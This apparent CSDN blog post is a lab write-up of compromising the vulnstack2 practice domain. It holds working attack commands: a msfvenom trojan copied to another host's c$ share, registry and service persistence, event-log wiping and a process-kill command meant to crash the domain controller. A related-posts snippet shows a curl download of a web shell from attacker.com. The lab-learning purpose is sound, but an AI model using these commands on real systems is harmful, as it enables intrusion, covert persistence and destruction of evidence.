记录一次vulnstack2靶场渗透过程

已于 2024-07-24 15:30:44 修改
阅读量203 收藏 4
点赞数 7
文章标签: 安全 web安全 网络安全
于 2024-07-24 14:23:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83366396/article/details/140660737
版权

外网信息搜集

扫描存活主机

发现两台主机,分别扫描端口

发现两台主机,分别扫描端口

注意到一台主机开启7001端口,存在webLogic漏洞。且两台都445端口均开启。

或者   改变参数,可以发现目标主机存在域环境

漏洞利用

成功获取到会话权限。接下来是后渗透模块。

内网渗透

提权

查看当前权限,发现权限不够,需要提权。使用getsystem无果。

使用bypassuac模块 (这里2和7模块貌似用的比较多)

只需配置一个参数即可

成功提权

内网信息搜集

发现靶机是一台win2008的机器,机器名称为web

发现域内用户

域内成员组

确定域内管理员

确定存在域环境及内外网ip

确定域控及ip

域内机器       通过ping PC确定pc机器的ip

但是无法ping通,可能防火墙阻止了

确定靶机ip

总结:   域控  DC(10.10.10.10)  域管理员  administrator  域 de1ay.com

       域内机器  web(靶机) 192.168.138.80   10.10.10.80

  pc(10.10.10.201)

       域内用户  五个     还有一个扫描出的192.168.138.201,推测是pc这台机器

横向移动

既然内网都在同一网段,考虑使用横向移动的方式控制域控或另一台机器

首先添加路由

run get_local_subnets

run autoroute -s 10.10.10.0/24

run autoroute -p

扫描内网网段存活主机,确定只有这几个机器了。

对域控和pc进行扫描,发现两个都存在445端口和3389端口

利用exploit/windows/smb/ms17_010_psexec模块对两台机器进行利用(这里尝试几次后,发现需要将lhost设为靶机内网ip,将rhost设为目标机器ip)

横向移动到DC

只成功获取域控DC权限

获取存在的hash密码,得到域管理员密码

接下来尝试控制PC

横向移动到PC
 

利用msf生成一个木马文件,再建立ipc连接

msfvenom -p windows/meterpreter/bind_tcp lport=3300 -f exe -o msf3300.exe



 

上传木马至DC

将木马文件复制到pc的c盘中

copy msf3300.exe \\10.10.10.201\c$

设置监听,注意此时payload需设为正向

开启远程桌面后双击运行exe木马,msf成功上线

至此获取所有机器权限

权限维持

metsvc服务

对DC进行权限维持,上传了一个开机自启的metsvc服务

run metsvc -A

登录域控看到上传成功

注册表

或者利用注册表,对之前上传的exe文件进行开机自启(因为metsvc服务不一定起作用)

REG ADD "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_SZ /d "C:\Windows\system32\msf6666.exe"

注意:引号必须得是英文的

痕迹清除

查看痕迹   run event_manager -i

run event_manager -c   使用这行命令可以清除windows日志文件中的相关内容。

再次查看时,痕迹已被清除

PS:可以进行一个操作:结束域控DC的进程

taskkill /f /fi “pid ne 1”      这行命令可以使电脑蓝屏

网络攻防
关注
  • 7
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红日靶场vulnstack1 内网渗透学习
snowlyzz的博客
09-18 2133
红日靶场渗透教程
【内网渗透vulnstack第二个靶场
m0_58236911的博客
04-29 468
本文为个人在练习红日安全vulnstack系列的第二个靶场时所写笔记,希望对大家能有所帮助,若有疑问,欢迎提出交流,敬请各位批评指正!进入C:\Oracle\Middleware\user_projects\domains\base_domain目录,也可以使用 CobaltStrike自带的提权插件,提权手段很多这里不举例。右击会话—jump—psexec64(PC为32位,需要使用psexec)模拟外网网段:192.168.111.0/24。权限维持有多种途径,这里采用的是黄金票据。
ATT&CK 靶场 vulnstack1 超详细渗透记录
mdp1234的博客
10-06 2054
vulnstack内网渗透环境靶场-1 靶场下载地址: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑图: 基本信息 win7为VM1,win2003为VM2,win2008为VM3 原始密码为hongrisec@2019 可自行修改 攻击机: kali ip:192.168.162.81 winXp ip: 192.168.162.137 靶机: win7 外网ip:192.168.162.7 内网i...
ATT&CK 靶场 vulnstack2 超详细渗透记录
mdp1234的博客
02-05 3441
本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、环境搭建 靶场下载地址:下载地址 靶场统一登录密码:1qaz@WSX 环境的拓朴图 web机的开机,改用de1ay/de1ay用户登录,密码:1qaz@WSX 其他机器用户不变,密码:1qaz@WSX dc机ip:192.168.225.10 web机ip:192.168.225.12 192.168.162.5 pc机ip:192.168.225.11 192.168.162.3 攻击机:
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84297455的博客
04-28 846
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程。在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
2024年网安最全Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场
2401_84252281的博客
05-03 1280
是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程
内网域渗透总结(红日靶场一)
未完成的歌~的博客
04-11 6088
使用 smb beacon,由一台已经拿到 beacon 的机器,抓取密码后进行smb喷射,得到另一台开放445端口的机器上的administrator账户密码,在目标机器不出网的情况下,可以使用smb beacon使目标主机上线。发现也存在漏洞,同样先使用 use exploit/windows/smb/ms17_010_eternalblue 模块利用,但还是利用不了,猜测可能是防火墙的问题,因为这个系统是64位的。防火墙已经关掉了,再来试试 ms17_010_eternalblue,然而还是不行。
Vulnstack红日安全内网域渗透靶场1实战_vulnstack靶场(1)
2401_84297455的博客
04-28 832
VulnStack是由红日安全团队倾力打造一个靶场知识平台,靶场环境(CMS、漏洞管理、以及域管理等)全部依据国内企业的业务习惯进行模拟,环境设计思路全部来源 ATT&CK 红队评估设计模式,从环境搭建、漏洞利用、内网搜集、横向移动、构建通道、持久控制、痕迹清理等方式进行搭建靶场和设计题目。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场渗透过程
vuInhub靶场实战系列-prime:2
06-08
vuInhub靶场实战系列-prime:2
渗透学习 webug4.0靶场
07-12
渗透学习 webug4.0靶场 渗透学习 webug4.0靶场 渗透学习 webug4.0靶场
渗透测试;靶场搭建;视频解说详细搭建过程.zip
12-06
人群:适合渗透测试初学者,需要搭建渗透测试模拟真实场景——靶场的学者,以及在搭建过程中,出现的问题,不成功等学者使用; 场景:适合学习渗透测试的学生,搭建模拟真实坏境,进行渗透测试学习和练习的学者;
php自查无后门靶场源码,渗透测试源码一套
03-22
同时,靶场源码也可以作为教学材料,帮助初学者理解渗透测试过程和PHP安全编程原则。 总的来说,"php自查无后门靶场源码"是一套宝贵的教育资源,对于提升PHP开发者和安全专业人员的技能具有重要价值。通过深入学习...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传...无论你是想在网络安全领域发展,还是仅仅对这个话题感兴趣,投入时间在这个靶场上,都将是一次有价值的学习体验。
客户端与服务器通讯详解(5):安全威胁与应对策略
最新发布
贝格前端工场的博客
07-23 388
在进行客户端与服务器通讯的时候,要时刻防范安全威胁,后端有一句名言“永远不要相信用户在前端的输入”,就是说客户端和服务器之间通讯,必须有严密的规则。
ForCloud全栈安全体验,一站式云安全托管试用 开启全能高效攻防
亚信安全官方账号的博客
07-19 520
一站式云安全托管限时试用 开启全能高效攻防
Vue的安全性:防范XSS攻击与安全最佳实践
哎 你看的博客
07-19 659
随着Web应用的普及,前端安全问题日益受到重视。Vue作为当下流行的前端框架,其安全性也成为开发者关注的焦点。跨站脚本攻击(XSS)是常见的Web安全漏洞之一,本文将讨论如何在使用Vue时防范XSS攻击,并分享其他Vue中的安全最佳实践。
邮件安全篇:邮件端到端加密S/MIME
sdexcel的专栏
07-19 1133
本文主要介绍电子邮件端到端加密S/MIME的工作原理及客户端支持现状。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
在 DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值